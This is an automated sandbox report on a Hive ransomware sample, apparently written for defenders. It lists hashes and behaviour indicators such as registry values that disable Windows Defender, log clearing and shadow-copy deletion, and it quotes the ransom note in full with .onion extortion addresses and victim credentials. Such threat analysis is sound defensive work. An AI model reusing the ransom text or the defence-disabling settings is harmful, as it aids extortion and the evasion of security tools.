hive | 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277

General

Target

0e4d44dde522c07d09d9e3086cfae803.exe
Size

3.9MB
MD5

0e4d44dde522c07d09d9e3086cfae803
SHA1

d8dc26e2094869a0da78ecb47494c931419302dc
SHA256

33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512

ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP

49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Score

10^/10

hive evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\n8pw_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: fTP4dtHQ51ZX Password: 7zC1gVatfxGNUwxnLe4e To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.cv2gj files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal on Host
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

3368 wevtutil.exe
3868 wevtutil.exe
5068 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1536 bcdedit.exe
4384 bcdedit.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

pid	process
3368	wevtutil.exe
3868	wevtutil.exe
5068	wevtutil.exe

pid	process
1536	bcdedit.exe
4384	bcdedit.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

0e4d44dde522c07d09d9e3086cfae803.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\UnprotectConvertFrom.tiff.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File renamed	C:\Users\Admin\Pictures\FindClear.png => C:\Users\Admin\Pictures\FindClear.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_IAAAACAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Users\Admin\Pictures\FindClear.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_IAAAACAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File renamed	C:\Users\Admin\Pictures\LimitDisable.tif => C:\Users\Admin\Pictures\LimitDisable.tif.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Users\Admin\Pictures\LimitDisable.tif.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File renamed	C:\Users\Admin\Pictures\SyncCompress.raw => C:\Users\Admin\Pictures\SyncCompress.raw.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Users\Admin\Pictures\SyncCompress.raw.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File renamed	C:\Users\Admin\Pictures\UnprotectConvertFrom.tiff => C:\Users\Admin\Pictures\UnprotectConvertFrom.tiff.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in Program Files directory 64 IoCs

Processes:

0e4d44dde522c07d09d9e3086cfae803.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-pl.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_CAAAAAgAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Wood.dxt	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-white\WideTile.scale-100.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\WideTile.scale-200.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-lightunplated.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White@3x.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileMediumSquare.scale-200.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AgAAAAIAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\basicstylish.dotx.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-24.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Square310x310Logo.scale-100.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-40.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File created	C:\Program Files\VideoLAN\VLC\lua\modules\n8pw_HOW_TO_DECRYPT.txt	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HgAAAB4AAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-150.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_BgAAAAYAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\BadgeLogo.scale-200_contrast-white.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-400.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\PlayStore_icon.svg.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_KAAAACgAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-pl.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_BgAAAAYAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\webviewCore.min.js	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoSearchResults_180x160.svg.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\createpdf.svg.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_CAAAAAgAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\n8pw_HOW_TO_DECRYPT.txt	0e4d44dde522c07d09d9e3086cfae803.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\n8pw_HOW_TO_DECRYPT.txt	0e4d44dde522c07d09d9e3086cfae803.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\n8pw_HOW_TO_DECRYPT.txt	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ppd.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HgAAAB4AAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-20_altform-unplated.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-36_altform-lightunplated.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-400.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_KMS_Automation-ul.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_DAAAAAwAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-16_altform-unplated_contrast-white.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\index.txt	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-125.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover_2x.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_JAAAACQAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldExist.snippets.ps1xml	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_JgAAACYAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-80_altform-unplated_contrast-white.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\SmallTile.scale-200.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml	0e4d44dde522c07d09d9e3086cfae803.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\n8pw_HOW_TO_DECRYPT.txt	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\hand.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\db2v0801.xsl.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_EgAAABIAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_EAAAABAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\n8pw_HOW_TO_DECRYPT.txt	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN010.XML.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24.png	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_JgAAACYAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\plugin.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_MAAAADAAAAA0.cv2gj	0e4d44dde522c07d09d9e3086cfae803.exe

Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2112 sc.exe
4464 sc.exe
3860 sc.exe
4180 sc.exe
2192 sc.exe
3872 sc.exe
2684 sc.exe
4120 sc.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3172 vssadmin.exe
Runs net.exe

pid	process
2112	sc.exe
4464	sc.exe
3860	sc.exe
4180	sc.exe
2192	sc.exe
3872	sc.exe
2684	sc.exe
4120	sc.exe

pid	process
3172	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe0e4d44dde522c07d09d9e3086cfae803.exe

pid	process
2400	powershell.exe
2400	powershell.exe
3160	powershell.exe
3160	powershell.exe
3536	0e4d44dde522c07d09d9e3086cfae803.exe
3536	0e4d44dde522c07d09d9e3086cfae803.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	3368	wevtutil.exe
Token: SeBackupPrivilege	3368	wevtutil.exe
Token: SeSecurityPrivilege	3868	wevtutil.exe
Token: SeBackupPrivilege	3868	wevtutil.exe
Token: SeSecurityPrivilege	5068	wevtutil.exe
Token: SeBackupPrivilege	5068	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	2136	wmic.exe
Token: SeSecurityPrivilege	2136	wmic.exe
Token: SeTakeOwnershipPrivilege	2136	wmic.exe
Token: SeLoadDriverPrivilege	2136	wmic.exe
Token: SeSystemProfilePrivilege	2136	wmic.exe
Token: SeSystemtimePrivilege	2136	wmic.exe
Token: SeProfSingleProcessPrivilege	2136	wmic.exe
Token: SeIncBasePriorityPrivilege	2136	wmic.exe
Token: SeCreatePagefilePrivilege	2136	wmic.exe
Token: SeBackupPrivilege	2136	wmic.exe
Token: SeRestorePrivilege	2136	wmic.exe
Token: SeShutdownPrivilege	2136	wmic.exe
Token: SeDebugPrivilege	2136	wmic.exe
Token: SeSystemEnvironmentPrivilege	2136	wmic.exe
Token: SeRemoteShutdownPrivilege	2136	wmic.exe
Token: SeUndockPrivilege	2136	wmic.exe
Token: SeManageVolumePrivilege	2136	wmic.exe
Token: 33	2136	wmic.exe
Token: 34	2136	wmic.exe
Token: 35	2136	wmic.exe
Token: 36	2136	wmic.exe
Token: SeIncreaseQuotaPrivilege	5028	wmic.exe
Token: SeSecurityPrivilege	5028	wmic.exe
Token: SeTakeOwnershipPrivilege	5028	wmic.exe
Token: SeLoadDriverPrivilege	5028	wmic.exe
Token: SeSystemProfilePrivilege	5028	wmic.exe
Token: SeSystemtimePrivilege	5028	wmic.exe
Token: SeProfSingleProcessPrivilege	5028	wmic.exe
Token: SeIncBasePriorityPrivilege	5028	wmic.exe
Token: SeCreatePagefilePrivilege	5028	wmic.exe
Token: SeBackupPrivilege	5028	wmic.exe
Token: SeRestorePrivilege	5028	wmic.exe
Token: SeShutdownPrivilege	5028	wmic.exe
Token: SeDebugPrivilege	5028	wmic.exe
Token: SeSystemEnvironmentPrivilege	5028	wmic.exe
Token: SeRemoteShutdownPrivilege	5028	wmic.exe
Token: SeUndockPrivilege	5028	wmic.exe
Token: SeManageVolumePrivilege	5028	wmic.exe
Token: 33	5028	wmic.exe
Token: 34	5028	wmic.exe
Token: 35	5028	wmic.exe
Token: 36	5028	wmic.exe
Token: SeIncreaseQuotaPrivilege	5028	wmic.exe
Token: SeSecurityPrivilege	5028	wmic.exe
Token: SeTakeOwnershipPrivilege	5028	wmic.exe
Token: SeLoadDriverPrivilege	5028	wmic.exe
Token: SeSystemProfilePrivilege	5028	wmic.exe
Token: SeSystemtimePrivilege	5028	wmic.exe
Token: SeProfSingleProcessPrivilege	5028	wmic.exe
Token: SeIncBasePriorityPrivilege	5028	wmic.exe
Token: SeCreatePagefilePrivilege	5028	wmic.exe
Token: SeBackupPrivilege	5028	wmic.exe
Token: SeRestorePrivilege	5028	wmic.exe
Token: SeShutdownPrivilege	5028	wmic.exe
Token: SeDebugPrivilege	5028	wmic.exe
Token: SeSystemEnvironmentPrivilege	5028	wmic.exe
Token: SeRemoteShutdownPrivilege	5028	wmic.exe
Token: SeUndockPrivilege	5028	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0e4d44dde522c07d09d9e3086cfae803.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3536 wrote to memory of 3752	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 3752	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3752 wrote to memory of 204	3752	net.exe	net1.exe
PID 3752 wrote to memory of 204	3752	net.exe	net1.exe
PID 3536 wrote to memory of 4836	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 4836	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 4836 wrote to memory of 4568	4836	net.exe	net1.exe
PID 4836 wrote to memory of 4568	4836	net.exe	net1.exe
PID 3536 wrote to memory of 4360	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 4360	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 4360 wrote to memory of 176	4360	net.exe	net1.exe
PID 4360 wrote to memory of 176	4360	net.exe	net1.exe
PID 3536 wrote to memory of 4612	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 3536 wrote to memory of 4612	3536	0e4d44dde522c07d09d9e3086cfae803.exe	net.exe
PID 4612 wrote to memory of 3836	4612	net.exe	net1.exe
PID 4612 wrote to memory of 3836	4612	net.exe	net1.exe
